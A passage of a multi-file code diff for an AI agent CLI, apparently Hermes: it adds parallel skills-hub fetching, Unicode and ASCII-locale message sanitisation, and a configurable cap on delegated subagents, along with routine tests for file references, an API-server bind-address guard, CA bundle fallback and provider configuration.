GitHubAuth, create_source_router, parallel_search_sources,
)
# Clamp page_size to safe range
@@ -198,27 +199,23 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
auth = GitHubAuth()
sources = create_source_router(auth)
# Collect results from all (or filtered) sources
# Use empty query to get everything; per-source limits prevent overload
# Collect results from all (or filtered) sources in parallel.
# Per-source limits are generous — parallelism + 30s timeout cap prevents hangs.
_TRUST_RANK = {"builtin": 3, "trusted": 2, "community": 1}
_PER_SOURCE_LIMIT = {"official": 100, "skills-sh": 100, "well-known": 25, "github": 100, "clawhub": 50,
"claude-marketplace": 50, "lobehub": 50}
_PER_SOURCE_LIMIT = {
"official": 200, "skills-sh": 200, "well-known": 50,
"github": 200, "clawhub": 500, "claude-marketplace": 100,
"lobehub": 500,
}
all_results: list = []
source_counts: dict = {}
for src in sources:
sid = src.source_id()
if source != "all" and sid != source and sid != "official":
# Always include official source for the "first" placement
continue
try:
limit = _PER_SOURCE_LIMIT.get(sid, 50)
results = src.search("", limit=limit)
source_counts[sid] = len(results)
all_results.extend(results)
except Exception:
continue
with c.status("[bold]Fetching skills from registries..."):
all_results, source_counts, timed_out = parallel_search_sources(
sources,
query="",
per_source_limits=_PER_SOURCE_LIMIT,
source_filter=source,
overall_timeout=30,
)
if not all_results:
c.print("[dim]No skills found in the Skills Hub.[/]\n")
@@ -252,8 +249,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
# Build header
source_label = f"{source}" if source != "all" else "— all sources"
loaded_label = f"{total} skills loaded"
if timed_out:
loaded_label += f", {len(timed_out)} source(s) still loading"
c.print(f"\n[bold]Skills Hub — Browse {source_label}[/]"
f" [dim]({total} skills, page {page}/{total_pages})[/]")
f" [dim]({loaded_label}, page {page}/{total_pages})[/]")
if official_count > 0 and page == 1:
c.print(f"[bright_cyan]★ {official_count} official optional skill(s) from Nous Research[/]")
c.print()
@@ -300,8 +300,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
parts = [f"{sid}: {ct}" for sid, ct in sorted(source_counts.items())]
c.print(f" [dim]Sources: {', '.join(parts)}[/]")
c.print("[dim]Use: hermes skills inspect <identifier> to preview, "
"hermes skills install <identifier> to install[/]\n")
if timed_out:
c.print(f" [yellow]⚡ Slow sources skipped: {', '.join(timed_out)} "
f"— run again for cached results[/]")
c.print("[dim]Tip: 'hermes skills search <query>' searches deeper across all registries[/]\n")
def do_install(identifier: str, category: str = "", force: bool = False,

View File

@@ -111,6 +111,32 @@ def display_hermes_home() -> str:
return str(home)
def get_subprocess_home() -> str | None:
"""Return a per-profile HOME directory for subprocesses, or None.
When ``{HERMES_HOME}/home/`` exists on disk, subprocesses should use it
as ``HOME`` so system tools (git, ssh, gh, npm …) write their configs
inside the Hermes data directory instead of the OS-level ``/root`` or
``~/``. This provides:
* **Docker persistence** — tool configs land inside the persistent volume.
* **Profile isolation** — each profile gets its own git identity, SSH
keys, gh tokens, etc.
The Python process's own ``os.environ["HOME"]`` and ``Path.home()`` are
**never** modified — only subprocess environments should inject this value.
Activation is directory-based: if the ``home/`` subdirectory doesn't
exist, returns ``None`` and behavior is unchanged.
"""
hermes_home = os.getenv("HERMES_HOME")
if not hermes_home:
return None
profile_home = os.path.join(hermes_home, "home")
if os.path.isdir(profile_home):
return profile_home
return None
VALID_REASONING_EFFORTS = ("minimal", "low", "medium", "high", "xhigh")

View File

@@ -359,8 +359,9 @@ def _sanitize_surrogates(text: str) -> str:
def _sanitize_messages_surrogates(messages: list) -> bool:
"""Sanitize surrogate characters from all string content in a messages list.
Walks message dicts in-place. Returns True if any surrogates were found
and replaced, False otherwise.
Walks message dicts in-place. Returns True if any surrogates were found
and replaced, False otherwise. Covers content/text, name, and tool call
metadata/arguments so retries don't fail on a non-content field.
"""
found = False
for msg in messages:
@@ -377,6 +378,88 @@ def _sanitize_messages_surrogates(messages: list) -> bool:
if isinstance(text, str) and _SURROGATE_RE.search(text):
part["text"] = _SURROGATE_RE.sub('\ufffd', text)
found = True
name = msg.get("name")
if isinstance(name, str) and _SURROGATE_RE.search(name):
msg["name"] = _SURROGATE_RE.sub('\ufffd', name)
found = True
tool_calls = msg.get("tool_calls")
if isinstance(tool_calls, list):
for tc in tool_calls:
if not isinstance(tc, dict):
continue
tc_id = tc.get("id")
if isinstance(tc_id, str) and _SURROGATE_RE.search(tc_id):
tc["id"] = _SURROGATE_RE.sub('\ufffd', tc_id)
found = True
fn = tc.get("function")
if isinstance(fn, dict):
fn_name = fn.get("name")
if isinstance(fn_name, str) and _SURROGATE_RE.search(fn_name):
fn["name"] = _SURROGATE_RE.sub('\ufffd', fn_name)
found = True
fn_args = fn.get("arguments")
if isinstance(fn_args, str) and _SURROGATE_RE.search(fn_args):
fn["arguments"] = _SURROGATE_RE.sub('\ufffd', fn_args)
found = True
return found
def _strip_non_ascii(text: str) -> str:
"""Remove non-ASCII characters, replacing with closest ASCII equivalent or removing.
Used as a last resort when the system encoding is ASCII and can't handle
any non-ASCII characters (e.g. LANG=C on Chromebooks).
"""
return text.encode('ascii', errors='ignore').decode('ascii')
def _sanitize_messages_non_ascii(messages: list) -> bool:
"""Strip non-ASCII characters from all string content in a messages list.
This is a last-resort recovery for systems with ASCII-only encoding
(LANG=C, Chromebooks, minimal containers). Returns True if any
non-ASCII content was found and sanitized.
"""
found = False
for msg in messages:
if not isinstance(msg, dict):
continue
# Sanitize content (string)
content = msg.get("content")
if isinstance(content, str):
sanitized = _strip_non_ascii(content)
if sanitized != content:
msg["content"] = sanitized
found = True
elif isinstance(content, list):
for part in content:
if isinstance(part, dict):
text = part.get("text")
if isinstance(text, str):
sanitized = _strip_non_ascii(text)
if sanitized != text:
part["text"] = sanitized
found = True
# Sanitize name field (can contain non-ASCII in tool results)
name = msg.get("name")
if isinstance(name, str):
sanitized = _strip_non_ascii(name)
if sanitized != name:
msg["name"] = sanitized
found = True
# Sanitize tool_calls
tool_calls = msg.get("tool_calls")
if isinstance(tool_calls, list):
for tc in tool_calls:
if isinstance(tc, dict):
fn = tc.get("function", {})
if isinstance(fn, dict):
fn_args = fn.get("arguments")
if isinstance(fn_args, str):
sanitized = _strip_non_ascii(fn_args)
if sanitized != fn_args:
fn["arguments"] = sanitized
found = True
return found
@@ -864,6 +947,7 @@ class AIAgent:
client_kwargs["default_headers"] = headers
self.api_key = client_kwargs.get("api_key", "")
self.base_url = client_kwargs.get("base_url", self.base_url)
try:
self.client = self._create_openai_client(client_kwargs, reason="agent_init", shared=True)
if not self.quiet_mode:
@@ -1893,14 +1977,19 @@ class AIAgent:
except Exception as e:
logger.debug("Background memory/skill review failed: %s", e)
finally:
# Close all resources (httpx client, subprocesses, etc.) so
# GC doesn't try to clean them up on a dead asyncio event
# loop (which produces "Event loop is closed" errors).
# Explicitly close the OpenAI/httpx client so GC doesn't
# try to clean it up on a dead asyncio event loop (which
# produces "Event loop is closed" errors in the terminal).
if review_agent is not None:
try:
review_agent.close()
except Exception:
pass
client = getattr(review_agent, "client", None)
if client is not None:
try:
review_agent._close_openai_client(
client, reason="bg_review_done", shared=True
)
review_agent.client = None
except Exception:
pass
t = threading.Thread(target=_run_review, daemon=True, name="bg-review")
t.start()
@@ -2640,64 +2729,6 @@ class AIAgent:
except Exception:
pass
def close(self) -> None:
"""Release all resources held by this agent instance.
Cleans up subprocess resources that would otherwise become orphans:
- Background processes tracked in ProcessRegistry
- Terminal sandbox environments
- Browser daemon sessions
- Active child agents (subagent delegation)
- OpenAI/httpx client connections
Safe to call multiple times (idempotent). Each cleanup step is
independently guarded so a failure in one does not prevent the rest.
"""
task_id = getattr(self, "session_id", None) or ""
# 1. Kill background processes for this task
try:
from tools.process_registry import process_registry
process_registry.kill_all(task_id=task_id)
except Exception:
pass
# 2. Clean terminal sandbox environments
try:
from tools.terminal_tool import cleanup_vm
cleanup_vm(task_id)
except Exception:
pass
# 3. Clean browser daemon sessions
try:
from tools.browser_tool import cleanup_browser
cleanup_browser(task_id)
except Exception:
pass
# 4. Close active child agents
try:
with self._active_children_lock:
children = list(self._active_children)
self._active_children.clear()
for child in children:
try:
child.close()
except Exception:
pass
except Exception:
pass
# 5. Close the OpenAI/httpx client
try:
client = getattr(self, "client", None)
if client is not None:
self._close_openai_client(client, reason="agent_close", shared=True)
self.client = None
except Exception:
pass
def _hydrate_todo_store(self, history: List[Dict[str, Any]]) -> None:
"""
Recover todo state from conversation history.
@@ -2990,7 +3021,7 @@ class AIAgent:
@staticmethod
def _cap_delegate_task_calls(tool_calls: list) -> list:
"""Truncate excess delegate_task calls to MAX_CONCURRENT_CHILDREN.
"""Truncate excess delegate_task calls to max_concurrent_children.
The delegate_tool caps the task list inside a single call, but the
model can emit multiple separate delegate_task tool_calls in one
@@ -2998,23 +3029,24 @@ class AIAgent:
Returns the original list if no truncation was needed.
"""
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
from tools.delegate_tool import _get_max_concurrent_children
max_children = _get_max_concurrent_children()
delegate_count = sum(1 for tc in tool_calls if tc.function.name == "delegate_task")
if delegate_count <= MAX_CONCURRENT_CHILDREN:
if delegate_count <= max_children:
return tool_calls
kept_delegates = 0
truncated = []
for tc in tool_calls:
if tc.function.name == "delegate_task":
if kept_delegates < MAX_CONCURRENT_CHILDREN:
if kept_delegates < max_children:
truncated.append(tc)
kept_delegates += 1
else:
truncated.append(tc)
logger.warning(
"Truncated %d excess delegate_task call(s) to enforce "
"MAX_CONCURRENT_CHILDREN=%d limit",
delegate_count - MAX_CONCURRENT_CHILDREN, MAX_CONCURRENT_CHILDREN,
"max_concurrent_children=%d limit",
delegate_count - max_children, max_children,
)
return truncated
@@ -5572,7 +5604,7 @@ class AIAgent:
preserve_dots=self._anthropic_preserve_dots(),
context_length=ctx_len,
base_url=getattr(self, "_anthropic_base_url", None),
fast_mode=self.request_overrides.get("speed") == "fast",
fast_mode=(self.request_overrides or {}).get("speed") == "fast",
)
if self.api_mode == "codex_responses":
@@ -7236,7 +7268,7 @@ class AIAgent:
self._thinking_prefill_retries = 0
self._last_content_with_tools = None
self._mute_post_response = False
self._surrogate_sanitized = False
self._unicode_sanitization_passes = 0
# Pre-turn connection health check: detect and clean up dead TCP
# connections left over from provider outages or dropped streams.
@@ -8221,22 +8253,40 @@ class AIAgent:
self.thinking_callback("")
# -----------------------------------------------------------
# Surrogate character recovery. UnicodeEncodeError happens
# when the messages contain lone surrogates (U+D800..U+DFFF)
# that are invalid UTF-8. Common source: clipboard paste
# from Google Docs or similar rich-text editors. We sanitize
# the entire messages list in-place and retry once.
# UnicodeEncodeError recovery. Two common causes:
# 1. Lone surrogates (U+D800..U+DFFF) from clipboard paste
# (Google Docs, rich-text editors) — sanitize and retry.
# 2. ASCII codec on systems with LANG=C or non-UTF-8 locale
# (e.g. Chromebooks) — any non-ASCII character fails.
# Detect via the error message mentioning 'ascii' codec.
# We sanitize messages in-place and may retry twice:
# first to strip surrogates, then once more for pure
# ASCII-only locale sanitization if needed.
# -----------------------------------------------------------
if isinstance(api_error, UnicodeEncodeError) and not getattr(self, '_surrogate_sanitized', False):
self._surrogate_sanitized = True
if _sanitize_messages_surrogates(messages):
if isinstance(api_error, UnicodeEncodeError) and getattr(self, '_unicode_sanitization_passes', 0) < 2:
_err_str = str(api_error).lower()
_is_ascii_codec = "'ascii'" in _err_str or "ascii" in _err_str
_surrogates_found = _sanitize_messages_surrogates(messages)
if _surrogates_found:
self._unicode_sanitization_passes += 1
self._vprint(
f"{self.log_prefix}⚠️ Stripped invalid surrogate characters from messages. Retrying...",
force=True,
)
continue
# Surrogates weren't in messages — might be in system
# prompt or prefill. Fall through to normal error path.
if _is_ascii_codec:
# ASCII codec: the system encoding can't handle
# non-ASCII characters at all. Sanitize all
# non-ASCII content from messages and retry.
if _sanitize_messages_non_ascii(messages):
self._unicode_sanitization_passes += 1
self._vprint(
f"{self.log_prefix}⚠️ System encoding is ASCII — stripped non-ASCII characters from messages. Retrying...",
force=True,
)
continue
# Nothing to sanitize in messages — might be in system
# prompt or prefill. Fall through to normal error path.
status_code = getattr(api_error, "status_code", None)
error_context = self._extract_api_error_context(api_error)

View File

@@ -83,6 +83,24 @@ def test_parse_references_strips_trailing_punctuation():
assert refs[1].target == "https://example.com/docs"
def test_parse_quoted_references_with_spaces_and_preserve_unquoted_ranges():
from agent.context_references import parse_context_references
refs = parse_context_references(
'review @file:"C:\\Users\\Simba\\My Project\\main.py":7-9 '
'and @folder:"docs and specs" plus @file:src/main.py:1-2'
)
assert [ref.kind for ref in refs] == ["file", "folder", "file"]
assert refs[0].target == r"C:\Users\Simba\My Project\main.py"
assert refs[0].line_start == 7
assert refs[0].line_end == 9
assert refs[1].target == "docs and specs"
assert refs[2].target == "src/main.py"
assert refs[2].line_start == 1
assert refs[2].line_end == 2
def test_expand_file_range_and_folder_listing(sample_repo: Path):
from agent.context_references import preprocess_context_references
@@ -106,6 +124,30 @@ def test_expand_file_range_and_folder_listing(sample_repo: Path):
assert not result.warnings
def test_expand_quoted_file_reference_with_spaces(tmp_path: Path):
from agent.context_references import preprocess_context_references
workspace = tmp_path / "repo"
folder = workspace / "docs and specs"
folder.mkdir(parents=True)
file_path = folder / "release notes.txt"
file_path.write_text("line 1\nline 2\nline 3\n", encoding="utf-8")
result = preprocess_context_references(
'Review @file:"docs and specs/release notes.txt":2-3',
cwd=workspace,
context_length=100_000,
)
assert result.expanded
assert result.message.startswith("Review")
assert "line 1" not in result.message
assert "line 2" in result.message
assert "line 3" in result.message
assert "release notes.txt" in result.message
assert not result.warnings
def test_expand_git_diff_staged_and_log(sample_repo: Path):
from agent.context_references import preprocess_context_references

View File

@@ -0,0 +1,132 @@
"""Tests for the API server bind-address startup guard.
Validates that is_network_accessible() correctly classifies addresses and
that connect() refuses to start on non-loopback without API_SERVER_KEY.
"""
import socket
from unittest.mock import AsyncMock, patch
import pytest
from gateway.config import PlatformConfig
from gateway.platforms.api_server import APIServerAdapter
from gateway.platforms.base import is_network_accessible
# ---------------------------------------------------------------------------
# Unit tests: is_network_accessible()
# ---------------------------------------------------------------------------
class TestIsNetworkAccessible:
"""Direct tests for the address classification helper."""
# -- Loopback (safe, should return False) --
def test_ipv4_loopback(self):
assert is_network_accessible("127.0.0.1") is False
def test_ipv6_loopback(self):
assert is_network_accessible("::1") is False
def test_ipv4_mapped_loopback(self):
# ::ffff:127.0.0.1 — Python's is_loopback returns False for mapped
# addresses; the helper must unwrap and check ipv4_mapped.
assert is_network_accessible("::ffff:127.0.0.1") is False
# -- Network-accessible (should return True) --
def test_ipv4_wildcard(self):
assert is_network_accessible("0.0.0.0") is True
def test_ipv6_wildcard(self):
# This is the bypass vector that the string-based check missed.
assert is_network_accessible("::") is True
def test_ipv4_mapped_unspecified(self):
assert is_network_accessible("::ffff:0.0.0.0") is True
def test_private_ipv4(self):
assert is_network_accessible("10.0.0.1") is True
def test_private_ipv4_class_c(self):
assert is_network_accessible("192.168.1.1") is True
def test_public_ipv4(self):
assert is_network_accessible("8.8.8.8") is True
# -- Hostname resolution --
def test_localhost_resolves_to_loopback(self):
loopback_result = [
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
]
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=loopback_result):
assert is_network_accessible("localhost") is False
def test_hostname_resolving_to_non_loopback(self):
non_loopback_result = [
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
]
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=non_loopback_result):
assert is_network_accessible("my-server.local") is True
def test_hostname_mixed_resolution(self):
"""If a hostname resolves to both loopback and non-loopback, it's
network-accessible (any non-loopback address is enough)."""
mixed_result = [
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
]
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=mixed_result):
assert is_network_accessible("dual-host.local") is True
def test_dns_failure_fails_closed(self):
"""Unresolvable hostnames should require an API key (fail closed)."""
with patch(
"gateway.platforms.base._socket.getaddrinfo",
side_effect=socket.gaierror("Name resolution failed"),
):
assert is_network_accessible("nonexistent.invalid") is True
# ---------------------------------------------------------------------------
# Integration tests: connect() startup guard
# ---------------------------------------------------------------------------
class TestConnectBindGuard:
"""Verify that connect() refuses dangerous configurations."""
@pytest.mark.asyncio
async def test_refuses_ipv4_wildcard_without_key(self):
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "0.0.0.0"}))
result = await adapter.connect()
assert result is False
@pytest.mark.asyncio
async def test_refuses_ipv6_wildcard_without_key(self):
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "::"}))
result = await adapter.connect()
assert result is False
def test_allows_loopback_without_key(self):
"""Loopback with no key should pass the guard."""
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "127.0.0.1"}))
assert adapter._api_key == ""
# The guard condition: is_network_accessible(host) AND NOT api_key
# For loopback, is_network_accessible is False so the guard does not block.
assert is_network_accessible(adapter._host) is False
@pytest.mark.asyncio
async def test_allows_wildcard_with_key(self):
"""Non-loopback with a key should pass the guard."""
adapter = APIServerAdapter(
PlatformConfig(enabled=True, extra={"host": "0.0.0.0", "key": "sk-test"})
)
# The guard checks: is_network_accessible(host) AND NOT api_key
# With a key set, the guard should not block.
assert adapter._api_key == "sk-test"
assert is_network_accessible("0.0.0.0") is True
# Combined: the guard condition is False (key is set), so it passes

View File

@@ -40,6 +40,7 @@ class TestProviderRegistry:
("copilot", "GitHub Copilot", "api_key"),
("huggingface", "Hugging Face", "api_key"),
("zai", "Z.AI / GLM", "api_key"),
("xai", "xAI", "api_key"),
("kimi-coding", "Kimi / Moonshot", "api_key"),
("minimax", "MiniMax", "api_key"),
("minimax-cn", "MiniMax (China)", "api_key"),
@@ -58,6 +59,12 @@ class TestProviderRegistry:
assert pconfig.api_key_env_vars == ("GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY")
assert pconfig.base_url_env_var == "GLM_BASE_URL"
def test_xai_env_vars(self):
pconfig = PROVIDER_REGISTRY["xai"]
assert pconfig.api_key_env_vars == ("XAI_API_KEY",)
assert pconfig.base_url_env_var == "XAI_BASE_URL"
assert pconfig.inference_base_url == "https://api.x.ai/v1"
def test_copilot_env_vars(self):
pconfig = PROVIDER_REGISTRY["copilot"]
assert pconfig.api_key_env_vars == ("COPILOT_GITHUB_TOKEN", "GH_TOKEN", "GITHUB_TOKEN")

View File

@@ -1,6 +1,7 @@
"""Regression tests for Nous OAuth refresh + agent-key mint interactions."""
import json
import os
from datetime import datetime, timezone
from pathlib import Path
@@ -10,6 +11,80 @@ import pytest
from hermes_cli.auth import AuthError, get_provider_auth_state, resolve_nous_runtime_credentials
# =============================================================================
# _resolve_verify: CA bundle path validation
# =============================================================================
class TestResolveVerifyFallback:
"""Verify _resolve_verify falls back to True when CA bundle path doesn't exist."""
def test_missing_ca_bundle_in_auth_state_falls_back(self):
from hermes_cli.auth import _resolve_verify
result = _resolve_verify(auth_state={
"tls": {"insecure": False, "ca_bundle": "/nonexistent/ca-bundle.pem"},
})
assert result is True
def test_valid_ca_bundle_in_auth_state_is_returned(self, tmp_path):
from hermes_cli.auth import _resolve_verify
ca_file = tmp_path / "ca-bundle.pem"
ca_file.write_text("fake cert")
result = _resolve_verify(auth_state={
"tls": {"insecure": False, "ca_bundle": str(ca_file)},
})
assert result == str(ca_file)
def test_missing_ssl_cert_file_env_falls_back(self, monkeypatch):
from hermes_cli.auth import _resolve_verify
monkeypatch.setenv("SSL_CERT_FILE", "/nonexistent/ssl-cert.pem")
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
result = _resolve_verify(auth_state={"tls": {}})
assert result is True
def test_missing_hermes_ca_bundle_env_falls_back(self, monkeypatch):
from hermes_cli.auth import _resolve_verify
monkeypatch.setenv("HERMES_CA_BUNDLE", "/nonexistent/hermes-ca.pem")
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
result = _resolve_verify(auth_state={"tls": {}})
assert result is True
def test_insecure_takes_precedence_over_missing_ca(self):
from hermes_cli.auth import _resolve_verify
result = _resolve_verify(
insecure=True,
auth_state={"tls": {"ca_bundle": "/nonexistent/ca.pem"}},
)
assert result is False
def test_no_ca_bundle_returns_true(self, monkeypatch):
from hermes_cli.auth import _resolve_verify
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
result = _resolve_verify(auth_state={"tls": {}})
assert result is True
def test_explicit_ca_bundle_param_missing_falls_back(self):
from hermes_cli.auth import _resolve_verify
result = _resolve_verify(ca_bundle="/nonexistent/explicit-ca.pem")
assert result is True
def test_explicit_ca_bundle_param_valid_is_returned(self, tmp_path):
from hermes_cli.auth import _resolve_verify
ca_file = tmp_path / "explicit-ca.pem"
ca_file.write_text("fake cert")
result = _resolve_verify(ca_bundle=str(ca_file))
assert result == str(ca_file)
def _setup_nous_auth(
hermes_home: Path,
*,

View File

@@ -0,0 +1,83 @@
"""Test that overlay providers with mismatched models.dev keys resolve correctly.
HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot") while
_PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot"). The slug
resolution in list_authenticated_providers() Section 2 must bridge this gap.
Covers: #5223, #6492
"""
import json
import os
from unittest.mock import patch
import pytest
from hermes_cli.model_switch import list_authenticated_providers
# -- Copilot slug resolution (env var path) ----------------------------------
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
def test_copilot_uses_hermes_slug():
"""github-copilot overlay should resolve to slug='copilot' with curated models."""
providers = list_authenticated_providers(current_provider="copilot")
copilot = next((p for p in providers if p["slug"] == "copilot"), None)
assert copilot is not None, "copilot should appear when COPILOT_GITHUB_TOKEN is set"
assert copilot["total_models"] > 0, "copilot should have curated models"
assert copilot["is_current"] is True
# Must NOT appear under the models.dev key
gh_copilot = next((p for p in providers if p["slug"] == "github-copilot"), None)
assert gh_copilot is None, "github-copilot slug should not appear (resolved to copilot)"
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
def test_copilot_no_duplicate_entries():
"""Copilot must appear only once — not as both 'copilot' (section 1) and 'github-copilot' (section 2)."""
providers = list_authenticated_providers(current_provider="copilot")
copilot_slugs = [p["slug"] for p in providers if "copilot" in p["slug"]]
# Should have at most one copilot entry (may also have copilot-acp if creds exist)
copilot_main = [s for s in copilot_slugs if s == "copilot"]
assert len(copilot_main) == 1, f"Expected exactly one 'copilot' entry, got {copilot_main}"
# -- kimi-for-coding alias in auth.py ----------------------------------------
def test_kimi_for_coding_alias():
"""resolve_provider('kimi-for-coding') should return 'kimi-coding'."""
from hermes_cli.auth import resolve_provider
result = resolve_provider("kimi-for-coding")
assert result == "kimi-coding"
# -- Generic slug mismatch providers -----------------------------------------
@patch.dict(os.environ, {"KIMI_API_KEY": "fake-key"}, clear=False)
def test_kimi_for_coding_overlay_uses_hermes_slug():
"""kimi-for-coding overlay should resolve to slug='kimi-coding'."""
providers = list_authenticated_providers(current_provider="kimi-coding")
kimi = next((p for p in providers if p["slug"] == "kimi-coding"), None)
assert kimi is not None, "kimi-coding should appear when KIMI_API_KEY is set"
assert kimi["is_current"] is True
# Must NOT appear under the models.dev key
kimi_mdev = next((p for p in providers if p["slug"] == "kimi-for-coding"), None)
assert kimi_mdev is None, "kimi-for-coding slug should not appear (resolved to kimi-coding)"
@patch.dict(os.environ, {"KILOCODE_API_KEY": "fake-key"}, clear=False)
def test_kilo_overlay_uses_hermes_slug():
"""kilo overlay should resolve to slug='kilocode'."""
providers = list_authenticated_providers(current_provider="kilocode")
kilo = next((p for p in providers if p["slug"] == "kilocode"), None)
assert kilo is not None, "kilocode should appear when KILOCODE_API_KEY is set"
assert kilo["is_current"] is True
kilo_mdev = next((p for p in providers if p["slug"] == "kilo"), None)
assert kilo_mdev is None, "kilo slug should not appear (resolved to kilocode)"

View File

@@ -9,7 +9,9 @@ Covers three static methods on AIAgent (inspired by PR #1321 — @alireza78a):
import types
from run_agent import AIAgent
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
from tools.delegate_tool import _get_max_concurrent_children
MAX_CONCURRENT_CHILDREN = _get_max_concurrent_children()
# ---------------------------------------------------------------------------

View File

@@ -0,0 +1,140 @@
"""Tests for UnicodeEncodeError recovery with ASCII codec.
Covers the fix for issue #6843 — systems with ASCII locale (LANG=C)
that can't encode non-ASCII characters in API request payloads.
"""
import pytest
from run_agent import (
_strip_non_ascii,
_sanitize_messages_non_ascii,
_sanitize_messages_surrogates,
)
class TestStripNonAscii:
"""Tests for _strip_non_ascii helper."""
def test_ascii_only(self):
assert _strip_non_ascii("hello world") == "hello world"
def test_removes_non_ascii(self):
assert _strip_non_ascii("hello ⚕ world") == "hello world"
def test_removes_emoji(self):
assert _strip_non_ascii("test 🤖 done") == "test done"
def test_chinese_chars(self):
assert _strip_non_ascii("你好world") == "world"
def test_empty_string(self):
assert _strip_non_ascii("") == ""
def test_only_non_ascii(self):
assert _strip_non_ascii("⚕🤖") == ""
class TestSanitizeMessagesNonAscii:
"""Tests for _sanitize_messages_non_ascii."""
def test_no_change_ascii_only(self):
messages = [{"role": "user", "content": "hello"}]
assert _sanitize_messages_non_ascii(messages) is False
assert messages[0]["content"] == "hello"
def test_sanitizes_content_string(self):
messages = [{"role": "user", "content": "hello ⚕ world"}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["content"] == "hello world"
def test_sanitizes_content_list(self):
messages = [{
"role": "user",
"content": [{"type": "text", "text": "hello 🤖"}]
}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["content"][0]["text"] == "hello "
def test_sanitizes_name_field(self):
messages = [{"role": "tool", "name": "⚕tool", "content": "ok"}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["name"] == "tool"
def test_sanitizes_tool_calls(self):
messages = [{
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_1",
"type": "function",
"function": {
"name": "read_file",
"arguments": '{"path": "⚕test.txt"}'
}
}]
}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["tool_calls"][0]["function"]["arguments"] == '{"path": "test.txt"}'
def test_handles_non_dict_messages(self):
messages = ["not a dict", {"role": "user", "content": "hello"}]
assert _sanitize_messages_non_ascii(messages) is False
def test_empty_messages(self):
assert _sanitize_messages_non_ascii([]) is False
def test_multiple_messages(self):
messages = [
{"role": "system", "content": "⚕ System prompt"},
{"role": "user", "content": "Hello 你好"},
{"role": "assistant", "content": "Hi there!"},
]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["content"] == " System prompt"
assert messages[1]["content"] == "Hello "
assert messages[2]["content"] == "Hi there!"
class TestSurrogateVsAsciiSanitization:
"""Test that surrogate and ASCII sanitization work independently."""
def test_surrogates_still_handled(self):
"""Surrogates are caught by _sanitize_messages_surrogates, not _non_ascii."""
msg_with_surrogate = "test \ud800 end"
messages = [{"role": "user", "content": msg_with_surrogate}]
assert _sanitize_messages_surrogates(messages) is True
assert "\ud800" not in messages[0]["content"]
assert "\ufffd" in messages[0]["content"]
def test_surrogates_in_name_and_tool_calls_are_sanitized(self):
messages = [{
"role": "assistant",
"name": "bad\ud800name",
"content": None,
"tool_calls": [{
"id": "call_\ud800",
"type": "function",
"function": {
"name": "read\ud800_file",
"arguments": '{"path": "bad\ud800.txt"}'
}
}],
}]
assert _sanitize_messages_surrogates(messages) is True
assert "\ud800" not in messages[0]["name"]
assert "\ud800" not in messages[0]["tool_calls"][0]["id"]
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["name"]
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["arguments"]
def test_ascii_codec_strips_all_non_ascii(self):
"""ASCII codec case: all non-ASCII is stripped, not replaced."""
messages = [{"role": "user", "content": "test ⚕🤖你好 end"}]
assert _sanitize_messages_non_ascii(messages) is True
# All non-ASCII chars removed; spaces around them collapse
assert messages[0]["content"] == "test end"
def test_no_surrogates_returns_false(self):
"""When no surrogates present, _sanitize_messages_surrogates returns False."""
messages = [{"role": "user", "content": "hello ⚕ world"}]
assert _sanitize_messages_surrogates(messages) is False

176
tests/test_cli_file_drop.py Normal file
View File

@@ -0,0 +1,176 @@
"""Tests for _detect_file_drop — file path detection that prevents
dragged/pasted absolute paths from being mistaken for slash commands."""
import os
import tempfile
from pathlib import Path
import pytest
from cli import _detect_file_drop
# ---------------------------------------------------------------------------
# Fixtures
# ---------------------------------------------------------------------------
@pytest.fixture()
def tmp_image(tmp_path):
"""Create a temporary .png file and return its path."""
img = tmp_path / "screenshot.png"
img.write_bytes(b"\x89PNG\r\n\x1a\n") # minimal PNG header
return img
@pytest.fixture()
def tmp_text(tmp_path):
"""Create a temporary .py file and return its path."""
f = tmp_path / "main.py"
f.write_text("print('hello')\n")
return f
@pytest.fixture()
def tmp_image_with_spaces(tmp_path):
"""Create a file whose name contains spaces (like macOS screenshots)."""
img = tmp_path / "Screenshot 2026-04-01 at 7.25.32 PM.png"
img.write_bytes(b"\x89PNG\r\n\x1a\n")
return img
# ---------------------------------------------------------------------------
# Tests: returns None for non-file inputs
# ---------------------------------------------------------------------------
class TestNonFileInputs:
def test_regular_slash_command(self):
assert _detect_file_drop("/help") is None
def test_unknown_slash_command(self):
assert _detect_file_drop("/xyz") is None
def test_slash_command_with_args(self):
assert _detect_file_drop("/config set key value") is None
def test_empty_string(self):
assert _detect_file_drop("") is None
def test_non_slash_input(self):
assert _detect_file_drop("hello world") is None
def test_non_string_input(self):
assert _detect_file_drop(42) is None
def test_nonexistent_path(self):
